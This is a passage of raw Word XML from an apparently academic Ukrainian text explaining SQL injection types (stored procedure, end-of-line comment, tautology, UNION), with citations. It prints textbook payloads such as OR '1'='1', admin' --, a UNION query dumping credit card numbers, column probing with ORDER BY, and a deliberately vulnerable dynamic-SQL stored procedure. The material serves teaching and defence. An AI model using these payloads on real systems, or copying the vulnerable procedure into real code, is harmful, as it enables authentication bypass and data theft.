          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1060">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E3B0B" w14:textId="4BF59D65" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ризик виконання зловмисного SQL запиту в збереженій процедурі збільшується якщо веб додаток не очищує введення користувача використовуючи динамічно побудований SQL запит для цієї процедури[2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Атакуючий може використати шкідливе введення для виконання зловмисного SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>запиту у збереженій процедурі.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469BEB50" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для прикладу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F3F7E" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B07D68" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create procedure Login @user_name varchar(20), @password varchar(20) As Declare @query varchar(250) Set @query = ‘Select 1 from usertable  Where username = ‘ + @user_name + ‘ and  password = ‘ + @password exec(@query) Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653A00A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Якщо зловмисник вводить наступний текст у поле вводу програми, використовуючи вище збережену процедуру, яка працює на задньому кінці, атакуючий зможе ввійти за допомогою</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512F5C40" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anyusername or 1=1’ anypassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F2DB11" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="007C39A4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>End of Line Comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAF085" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">При цьому типу атаки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, атакуючий використовує </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Line</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(коментар) у введенні. Коментарі в рядку коду часто позначаються (--), ігноруються запитом. Зловмисник скористається цією функцією коментування, написавши рядок коду, який закінчується коментарем. База даних виконуватиме код, доки вона не дійде до коментаря, після чого він буде ігнорувати решту запиту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779F3E2" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Наприклад: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E0F94" w14:textId="7BEA0B41" w:rsidR="00A419FD" w:rsidRPr="00B07D68" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM members WHERE username=’admin’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--'AND password=’password’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E991E2" w14:textId="374FA5C3" w:rsidR="00524BA9" w:rsidRDefault="00A419FD" w:rsidP="00524BA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">З цим запитом, атакуючий здатний увійти до облікового запису адміністратора без пароля, бо база даних проігнорує закоментовану частину, що починається після </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=’</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00791B5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326878D3" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="007C1060" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tautology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF00B52" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В даному типі атаки, атакуючий використовує умовний абзац OR таким чином, що умова цього пункту завжди буде правдою. Це може бути використано для проходження автентифікації.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF2C5E" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Наприклад:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585FB6D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="002B7D87" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ‘ ’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘1’=’1’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B3FF1" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Цей запит завжди буде правдивим, так як друга частина OR є правдою.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA0D4FE" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="007C1060" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37180950" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, нападник використовує пропозицію об'єднання</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(UNION), щоб додати шкідливий запит до запиту, як показано в прикладі: [22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A1143" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B07D68" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT NAME,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHONE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADDRESS FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E510F4" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Нападник перевіряє чи додаток вразливий до UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> додаючи символ (‘) в кінець “.php?id=” команди. Тип отриманого повідомлення про помилку покаже зловмисникові, чи є база даних вразливою для UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C843C5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, нападник поєднує в собі шкідливий запит із запитом, який запитує користувач, використовуючи пропозицію UNION. В результаті дані повернуться з обох таблиць, що беруть участь в UNION запиті. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCC252" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Однак, перед запуском UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, зловмисник впевнюється, що є рівне число стовпців таблиць, що беруть участь в запиті UNION. Щоб знайти правильне число стовпчиків, атакуючий спочатку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>використовує</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запит, який використовує пропозицію ORDER BY, а потім номер, щоб вказати кількість стовпців в базі даних, вибраних:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1790E4" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDERBY 10 -- </w:t>
      </w:r>
